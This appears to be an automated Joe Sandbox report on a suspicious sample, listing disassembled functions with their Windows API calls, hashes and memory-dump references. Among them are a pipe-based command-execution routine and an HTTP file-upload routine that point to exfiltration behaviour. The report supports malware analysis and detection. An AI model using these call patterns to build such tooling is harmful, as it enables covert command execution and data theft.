Opcode ID: b1e81b575414f4388359a34c5ea00a79d1fe2c168ca5d30315ef4cd7fd7b907f
Instruction ID: ebb12d329e9006f354ced7c030407de725955d77d45e5691cb06ca5ce48a8648
Opcode Fuzzy Hash: b1e81b575414f4388359a34c5ea00a79d1fe2c168ca5d30315ef4cd7fd7b907f
Instruction Fuzzy Hash: 30F02232610249ABCB18AF34DC46EBE73ECDB48324F10007AFB02D7381EA34AD019760

Function 00CF22FE Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00CE6C20: GetLastError.KERNEL32(00000000,00000000,?,00CE7A07,?,00000000,00000000,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010), ref: 00CE6C25
Part of subcall function 00CE6C20: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010,00CE0F62,00000000,00000000,00000000), ref: 00CE6CC3

EnumSystemLocalesW.KERNEL32(00CF25DC,00000001,FFFFFFFF,?,-00000050,?,00CF297B,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00CF2348

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 6ba1a11a731704abdf46a99a9cbf20fbbf8ad5233c712a49f03bcc65218643f7
Instruction ID: fc2ec2cd570ea39035018e7a6a1a100cf12ea25ed09ec5c2b94a10c1aa818a1f
Opcode Fuzzy Hash: 6ba1a11a731704abdf46a99a9cbf20fbbf8ad5233c712a49f03bcc65218643f7
Instruction Fuzzy Hash: 24F0467630030C1FDB145F359881B7A7B95EF81368B19442DFA098B690C6759D42CB50

Function 00CE830C Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00CE2540: EnterCriticalSection.KERNEL32(-00048871,?,00CE3825,00000000,00D13FB8,0000000C,00CE37EC,?,?,00CEA613,?,?,00CE6DC2,00000001,00000364,00000006), ref: 00CE254F

EnumSystemLocalesW.KERNEL32(00CE82FF,00000001,00D141D8,0000000C,00CE872A,00000000), ref: 00CE8344

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 149e00b001663797b37b873a8639864ffcd2091bba0ed64c9e02391d4f78014b
Instruction ID: 1904077a788cf153ebda985d416e1c9c4b00b81e13a857efe84faed5fb68a292
Opcode Fuzzy Hash: 149e00b001663797b37b873a8639864ffcd2091bba0ed64c9e02391d4f78014b
Instruction Fuzzy Hash: CEF03776A41300EFD700DF99E852B9DBBF0EB49721F10802AF915DB3A0CB7589859F55

Function 00CF2218 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00CE6C20: GetLastError.KERNEL32(00000000,00000000,?,00CE7A07,?,00000000,00000000,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010), ref: 00CE6C25
Part of subcall function 00CE6C20: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010,00CE0F62,00000000,00000000,00000000), ref: 00CE6CC3

EnumSystemLocalesW.KERNEL32(00CF2171,00000001,FFFFFFFF,?,?,00CF29D9,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00CF224F

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 379aa76ca9cb893011eaf74dd92b781d5c8fe0c234767e79470dad7e3ea91d8f
Instruction ID: f33aea8361c97dafc0576c7e428b434a93f9f5285ab2861a65023b3ee02a732c
Opcode Fuzzy Hash: 379aa76ca9cb893011eaf74dd92b781d5c8fe0c234767e79470dad7e3ea91d8f
Instruction Fuzzy Hash: C3F0E53A30020957DB04AF35DC4577ABF95EFC2760B068059EF198B291C6719942D791

Function 00CE882E Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00CE5B82,?,20001004,00000000,00000002,?,?,00CE518F), ref: 00CE8862

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: fd0090d2051f29a6c75dc53ca11b48f064aec5455aca6edf66f617c3755f7309
Instruction ID: 9d8d850d7df4545279c9f3aa179ba5d678f0fadb5da6c19088167de38d712e72
Opcode Fuzzy Hash: fd0090d2051f29a6c75dc53ca11b48f064aec5455aca6edf66f617c3755f7309
Instruction Fuzzy Hash: 47E04F36540258BBCF122F62DC08AAE3F15EF44761F008021FE1DB52A1CF328921BAA5

Function 00CDA458 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0002A464,00CD9F78), ref: 00CDA45D

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 265a5683f0c5aa8369cd590305edcc20f518098e4363e0277ad083b2bca7821a
Instruction ID: 7cfba621601a6d113c02195d727ceb1c22f2e37cb0e2c82d5a7a4969d01987c8
Opcode Fuzzy Hash: 265a5683f0c5aa8369cd590305edcc20f518098e4363e0277ad083b2bca7821a
Instruction Fuzzy Hash:

Function 00CDF82B Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00CDF9A7

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: e95a2fa80e74959b2b2ea43d4c42b3595dc8b2ab61d35824eb6c17c18f79c8ea
Instruction ID: 534e97c56772264e0842a4bb01acf892606085257dc174c83941c0ad209984ad
Opcode Fuzzy Hash: e95a2fa80e74959b2b2ea43d4c42b3595dc8b2ab61d35824eb6c17c18f79c8ea
Instruction Fuzzy Hash: 6F513431A006486ADB389A288CA57BEA799BB03304F18453FD7979B3D1C611DF47B242

Function 00CF0642 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00CF0642

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: f49b63254c64d5e268fe287d450b557d35431f0d10309718ec5ca86ab9595b62
Instruction ID: e9f60722995b63e5c2535e38a94dca31dfee671d5c4f6837aafe5011d26737ed
Opcode Fuzzy Hash: f49b63254c64d5e268fe287d450b557d35431f0d10309718ec5ca86ab9595b62
Instruction Fuzzy Hash: 1EA01138A00300AF83008F38AA283CA3AA8AE002803088028A008C8220EA2080888B22

Function 00CB5450 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2e0d170d57ee1e946a41bbf938e58e3b5217eb43e69b4df0e5d2b1b34c9a8ba
Instruction ID: 47583641829c6bbe6d6e7011cfd8112e382c7421940c87241d9c3e37dd86ddcb
Opcode Fuzzy Hash: c2e0d170d57ee1e946a41bbf938e58e3b5217eb43e69b4df0e5d2b1b34c9a8ba
Instruction Fuzzy Hash: DE2250B3F515145BDB0CCA5DDCA27EDB2E3AFD8214B0E803DA40AE3345EE79D9158684

Function 00CECFB9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 213bd0ca5e0def71af9b8adabf6a18bf3c4ad2425c1d5aa7b586cb790db2aa18
Instruction ID: 2885a73c31931334fb623cdf1bf2fcf6830e4b5ccd8bc10476304c4cfcd79172
Opcode Fuzzy Hash: 213bd0ca5e0def71af9b8adabf6a18bf3c4ad2425c1d5aa7b586cb790db2aa18
Instruction Fuzzy Hash: 1D322622D29F414DD7239635D862336A358AFB73C4F15D727E82AB5AAAEF29C5C34100

Function 00CF1A27 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID:
API String ID: 4283097504-0
Opcode ID: 35e7895e06e9fc996610f0ddb6c110f468fdd0cc4f3c7552a36807d4f89540a4
Instruction ID: 4cbf39488cfa8fd90d579d6b4080407f20353dddb40a0829a8ea3e06c090b613
Opcode Fuzzy Hash: 35e7895e06e9fc996610f0ddb6c110f468fdd0cc4f3c7552a36807d4f89540a4
Instruction Fuzzy Hash: 49B11675600749CBDB349F25CC82AB7B3E8EF44304F58452DEF97C6681EA70AA81DB11

Function 00CB4EF0 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87e1a8aadd28e4e00bf0e4d38fde6de42de70f88de26c1faa108c8bc75bdbf41
Instruction ID: e6ecc6e30feac4e93121ad71a9676e2c3200dcdbe42164aa39ffdf285916008b
Opcode Fuzzy Hash: 87e1a8aadd28e4e00bf0e4d38fde6de42de70f88de26c1faa108c8bc75bdbf41
Instruction Fuzzy Hash: D6913275A086898FDB11CF68C4907EEBFF2EF5A300F14865DD59197782C7768506CBA0

Function 00CB51A0 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88bf2d99bf448474e4e6d4f50cff443b9dfd7cc93a3921f2950abe0b5466a6fa
Instruction ID: 98ecb1d1b6d3b8e4f61ed9027490c9625af5189793e5babde27ec6622efa32bb
Opcode Fuzzy Hash: 88bf2d99bf448474e4e6d4f50cff443b9dfd7cc93a3921f2950abe0b5466a6fa
Instruction Fuzzy Hash: C0810E70A056458FDB05CFA8D890BEEBBF1FF19300F5842A9D824A7392C7759946CBA0

Function 00CF5F44 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a8cac11eb3fb54afeea15c6071d177ac0b08bd0fefdb9154823390d0885ea8a
Instruction ID: e879d825aeeecf65f8c7e639cb3e92d2eedd9e1a0b92b0ccaf3558059c0735ef
Opcode Fuzzy Hash: 9a8cac11eb3fb54afeea15c6071d177ac0b08bd0fefdb9154823390d0885ea8a
Instruction Fuzzy Hash: FC21B673F2053947770CC47E8C572BDB6E1C68C541745823EE8A6EA2C1D968D917E2E4

Function 00CF5E24 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb2245a21e541c4cfc6b1a136550276315ea7d2f824d3bc845ae21ee03665149
Instruction ID: 652366b079a63d4b6d4a0ce3c640a1b08c6b1df8d31ac1ce98a231901bfe0a36
Opcode Fuzzy Hash: eb2245a21e541c4cfc6b1a136550276315ea7d2f824d3bc845ae21ee03665149
Instruction Fuzzy Hash: 5D11A373F30C296A675C81698C172BAA5D2EBD825034F433AD926E72C4E8A4DE13D290

Function 00CDB610 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 5360063e7771fea2ad968e3c263f851ff5a5405a8b2a92ff5c0842dcf4bbcc88
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: C6110B77240082C3D61C8A2EC5F4ABBA795EAC5320B2F436BF3614B754D322DE579600

Function 00CE6142 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6847a3e9a0d7b7b8402b77278032b4f626891dfa6fd65570ac05521b0549e8d7
Instruction ID: 588b4cea28ed3d0c3a1beac742f9e8917cd619fa0cfe4b6d460012cd0620b0e4
Opcode Fuzzy Hash: 6847a3e9a0d7b7b8402b77278032b4f626891dfa6fd65570ac05521b0549e8d7
Instruction Fuzzy Hash: 14E08C329252A8EBCB15DB89C90498EF3ECEB48B40B110096B515D3202C670DF00DBD0

Function 00CB8280 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 257pipeprocessfileCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000080,?,?,?,?,?,?,?,?,?), ref: 00CB832D
CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000), ref: 00CB8403
SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 00CB8415
Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00CB8459
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00000044,?), ref: 00CB8481
Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 00CB848F
WaitForSingleObject.KERNEL32(?,00000064), ref: 00CB84B8
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CB84DA
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CB84FE
ReadFile.KERNEL32(00000000,?,0000007F,00000000,00000000), ref: 00CB8525
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CB856A
CloseHandle.KERNEL32(?), ref: 00CB8581
CloseHandle.KERNEL32(?), ref: 00CB8589
CloseHandle.KERNEL32(00000000), ref: 00CB8591
CloseHandle.KERNEL32(00000000), ref: 00CB8599
GetLastError.KERNEL32 ref: 00CB85A3

Strings

D, xrefs: 00CB83BC

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: Handle$ClosePipeWow64$NamedPeek$CreateRedirection$DisableErrorFileInformationLastObjectPathProcessReadRevertSingleTempWait
String ID: D
API String ID: 3215130363-2746444292
Opcode ID: b554dc2b8b9b4d100fdfc1fb6c0d75b984c880d6c873476e86b61d827ce29300
Instruction ID: 2a7b217506e10561a1587a0be228c00a19836094c9109428311480fb940ae6d2
Opcode Fuzzy Hash: b554dc2b8b9b4d100fdfc1fb6c0d75b984c880d6c873476e86b61d827ce29300
Instruction Fuzzy Hash: B5A17071D40219ABEB20DF64CC45BDDB7B9AB04704F1041D6FA08A6291DB75AF88CFA1

Function 00CEFEDF Relevance: 25.9, APIs: 17, Instructions: 411COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00CEFF09
_free.LIBCMT ref: 00CEFFE2
_free.LIBCMT ref: 00CF000F

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 28061dc5d3e907b20e606777f96c5dd3fd19e66c3909913e99a3b92df8826527
Instruction ID: c8d0da4fbcfac40d7ef2343adc74e8c673ec76d3e0e5c0740e8f2f60d23560d8
Opcode Fuzzy Hash: 28061dc5d3e907b20e606777f96c5dd3fd19e66c3909913e99a3b92df8826527
Instruction Fuzzy Hash: A8D14C71900349AFDB60AFB58C51A7E77F8AF00B10F24812DEA25D7293EF319A45D762

Function 00CC0020 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 331networkfileCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET(00000000,00000000), ref: 00CC0058
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00CC00A8
HttpSendRequestExA.WININET(00000000,00000028,00000000,00000008,00000000), ref: 00CC00DA
InternetWriteFile.WININET(00000000,?,?,?), ref: 00CC00FA
ReadFile.KERNEL32(00000000,?,00000004,00000010,00000000), ref: 00CC0141
InternetWriteFile.WININET(00000000,?,00000010,?), ref: 00CC016E
InternetWriteFile.WININET(00000000,?,?,?), ref: 00CC01CA
HttpEndRequestW.WININET(00000000,00000000,00000008,00000000), ref: 00CC01EC
InternetCloseHandle.WININET(00000000), ref: 00CC01FD
InternetCloseHandle.WININET(?), ref: 00CC0207
InternetCloseHandle.WININET(00000000), ref: 00CC0211
CloseHandle.KERNEL32(00000000), ref: 00CC021D

Strings

YJ3RNw==, xrefs: 00CC0036

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
